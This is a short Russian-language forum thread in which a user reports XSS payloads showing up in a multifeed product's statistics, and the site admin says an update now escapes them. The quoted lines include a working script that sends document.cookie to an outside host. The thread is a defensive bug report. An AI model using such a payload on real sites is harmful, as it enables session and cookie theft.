XSS уязвимость

обсуждение лучшего мультифида :)

Модератор: Begemot

Ответить
backup
Сообщения: 16777212
Зарегистрирован: Пт янв 26, 2007 5:11 pm

Сообщение backup » Ср ноя 29, 2006 8:21 am

в статсах мультифида встречаются вот такие запросы:

Код: Выделить всё

 <script>alert('Hier ist die XSS lьcke');<script> 
 <script>(new Image).src = "http://www.boeserechner.de/s/c.php?c=" + escape(document.cookie);</script>) 
 и т.п. 
браузер их исполняет

Ссылка:
BBcode:
HTML:
Скрыть ссылки на пост
Показать ссылки на пост

Begemot
Site Admin
Сообщения: 1138
Зарегистрирован: Вс май 01, 2005 3:20 pm

Сообщение Begemot » Чт ноя 30, 2006 10:55 am

практически это ничем не грозит так как пароль хранится не в куке,
но могут быть другие комбинации кодов, поэтому я уже сделал апдейт,
там это все дело квотится.

Ссылка:
BBcode:
HTML:
Скрыть ссылки на пост
Показать ссылки на пост

Ответить